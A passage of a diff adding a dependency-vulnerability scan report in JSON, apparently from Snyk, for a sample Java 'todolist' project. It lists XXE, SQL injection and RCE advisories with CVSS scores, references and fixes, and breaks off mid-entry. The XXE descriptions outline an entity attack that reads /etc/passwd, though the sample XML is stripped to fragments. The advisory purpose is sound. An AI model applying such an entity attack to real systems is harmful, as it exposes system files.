"vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/Namespace.java", + "className": "Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/QName.java", + "className": "QName", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/dom4j/dom4j/issues/48", + "title": "GitHub Issue" + }, + { + "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", + "title": "POC: Ihacktoprotect Blog" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:55.789489Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", + "epssDetails": { + "percentile": "0.70906", + "probability": "0.00325", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1000632" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-6pcc-3rfx-4gpm" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2019-04-10T16:07:04.634619Z", + "functions_new": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.QName", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-01T19:12:29Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2018-08-21T14:16:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.900402Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "dom4j:dom4j", + "version": "1.6.1", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-DOM4J-2812975", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.4, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/a822852", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:31.083245Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", + "epssDetails": { + "percentile": "0.79800", + "probability": "0.00664", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10683" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-hwj3-m3p6-hj38" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2022-05-10T12:56:27.582369Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-04-15T09:38:17Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2020-04-16T15:22:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.985080Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "dom4j:dom4j", + "version": "1.6.1", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-JAVAXSERVLET-30449", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "credit": [ + "David Jorm" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "javax.servlet:jstl", + "references": [ + { + "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", + "title": "Apache Mail Archive" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", + "title": "NVD" + }, + { + "url": "https://access.redhat.com/security/cve/CVE-2015-0254", + "title": "RedHat CVE Database" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "cvssV3BaseScore": 7.6, + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:43.270072Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "description": "## Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", + "epssDetails": { + "percentile": "0.94002", + "probability": "0.07046", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-0254" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-6x4w-8w53-xrvv" + ] + }, + "packageName": "javax.servlet:jstl", + "proprietary": false, + "creationTime": "2017-02-22T07:28:19.341000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-02-27T16:13:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "javax.servlet", + "artifactId": "jstl" + }, + "publicationTime": "2015-02-27T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.017447Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "javax.servlet:jstl", + "version": "1.2", + "severityWithCritical": "high" + }, + { + "id": "snyk:lic:maven:javax.servlet:jstl:CDDL-1.0", + "type": "license", + "title": "CDDL-1.0 license", + "semver": { + "vulnerable": [ + "[1.2,)" + ] + }, + "license": "CDDL-1.0", + "language": "java", + "description": "CDDL-1.0 license", + "packageName": "javax.servlet:jstl", + "creationTime": "2024-06-18T08:06:13.191Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T08:06:13.191Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "javax.servlet:jstl", + "version": "1.2", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-1041788", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.4.24.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "5.4.24.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", + "className": "SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Delete.java", + "className": "Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Insert.java", + "className": "Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/InsertSelect.java", + "className": "InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/QuerySelect.java", + "className": "QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Select.java", + "className": "Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/SimpleSelect.java", + "className": "SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Update.java", + "className": "Update", + "functionName": "toStatementString" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", + "title": "GitHub Commit" + }, + { + "url": "https://access.redhat.com/security/cve/cve-2020-25638", + "title": "Redhat CVE Details" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:14.190706Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", + "epssDetails": { + "percentile": "0.72103", + "probability": "0.00352", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25638" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-11-19T16:51:52.251545Z", + "functions_new": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Update", + "functionName": "toStatementString" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-11-19T16:51:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-11-19T16:57:14.572204Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.086548Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-584563", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Gail Badner" + ], + "semver": { + "vulnerable": [ + "[,5.3.18.Final)", + "[5.4.0.Final, 5.4.18.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.18.Final", + "5.4.18.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", + "className": "LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/pull/3438", + "title": "GitHub Pull Request" + }, + { + "url": "https://hibernate.atlassian.net/browse/HHH-14077", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:47.723462Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", + "epssDetails": { + "percentile": "0.42797", + "probability": "0.00104", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14900" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-07-15T13:53:15.331818Z", + "functions_new": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-18T13:46:30Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-07-15T16:40:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.262550Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final", + "severityWithCritical": "high" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.3.0.CR1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-core", + "creationTime": "2024-06-18T19:09:16.096Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T19:09:16.096Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHSQLDB-3040860", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "OSS Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,2.7.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hsqldb:hsqldb", + "references": [ + { + "url": 